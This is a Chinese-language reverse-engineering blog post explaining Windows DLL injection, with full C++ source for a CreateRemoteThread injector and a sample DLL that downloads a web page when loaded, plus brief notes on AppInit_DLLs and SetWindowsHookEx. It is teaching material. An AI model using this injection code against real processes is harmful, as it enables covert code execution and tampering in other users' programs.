dll注入

DLL 注入

DLL 注入是命令其他进程自行调用LoadLibrary() API加载用户指定的DLL,加载DLL的过程中会自动调用DllMain()函数,从而实现各种功能

DLL的实现方法

  • 创建远程线程(CreateRemoteThread)
  • 使用注册表(AppInit_Dlls)
  • 消息勾取(SetWindowsHookEx() API)

CreateRemoteThread()

主程序

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
// InjectDll.cpp
#include <cstdio>

#include "windows.h"
#include "tchar.h"

BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath)
{
    HANDLE hProcess = NULL, hThread = NULL;
    HMODULE hMod = NULL;
    LPVOID pRemoteBuf = NULL;

    //确定路径需要占用的缓冲区大小
    DWORD dwBufSize = (DWORD)(_tcslen(szDllPath) + 1) * sizeof(TCHAR);
    LPTHREAD_START_ROUTINE pThreadProc;

    
    if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)))
    {
        _tprintf("OpenProcess(%d) failed!!! [%d]\n", dwPID, GetLastError());
        return FALSE;
    }

    
    pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);

    
    WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllPath, dwBufSize, NULL);

    
    hMod = GetModuleHandle("kernel32.dll");
    pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod, "LoadLibraryW");

   
    hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);

   
    CloseHandle(hThread);
    CloseHandle(hProcess);

    return TRUE;

}

int _tmain(int argc, TCHAR* argv[])
{
    if (argc != 3)
    {
        _tprintf("USAGE : %s <pid> <dll_path>\n", argv[0]);
        return 1;
    }

    // inject dll
    if (InjectDll((DWORD)_tstol(argv[1]), argv[2]))
        _tprintf("InjectDll(\"%s\") success!!!\n", argv[2]);
    else
        _tprintf("InjectDll(\"%s\") failed!!!\n", argv[2]);

    return 0;

}

DLL download index.html 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
// myhack.cpp
#include "windows.h"
#include "tchar.h"

#pragma comment(lib, "urlmon.lib")

#define DEF_URL             ("http://www.naver.com/index.html")
#define DEF_FILE_NAME   ("index.html")

HMODULE g_hMod = NULL;

DWORD WINAPI ThreadProc(LPVOID lParam)
{
    TCHAR szPath[_MAX_PATH] = { 0, };

    if (!GetModuleFileName(g_hMod, szPath, MAX_PATH))
        return FALSE;

    TCHAR* p = _tcsrchr(szPath, '\\');
    if (!p)
        return FALSE;

    _tcscpy_s(p + 1, _MAX_PATH, DEF_FILE_NAME); //参数准备

    URLDownloadToFile(NULL, DEF_URL, szPath, 0, NULL); //调用函数进行URL下载

    return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    HANDLE hThread = NULL;

    g_hMod = (HMODULE)hinstDLL;

    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
            OutputDebugString("<myhack.dll> Injection!!!");

           hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);


         CloseHandle(hThread);
         break;
    }

    return TRUE;

}

注册表

windows 操作系统默认提供了AppInit_Dlls和LoadAppInit_Dlls两个注册表,当User32.dll被加载到到进程中,会读取Appinit表中的dll中,加载到进程中。所以可以利用这个特性加载任意的Dll。

User32.dll是windows图形界面的主要支持。是非常常见的Dll。

SetWindowsHookEx()

RE
dll注入
https://lafdrew.github.io/2024/06/24/dll注入/
Author
John Doe
Posted on
June 24, 2024
Licensed under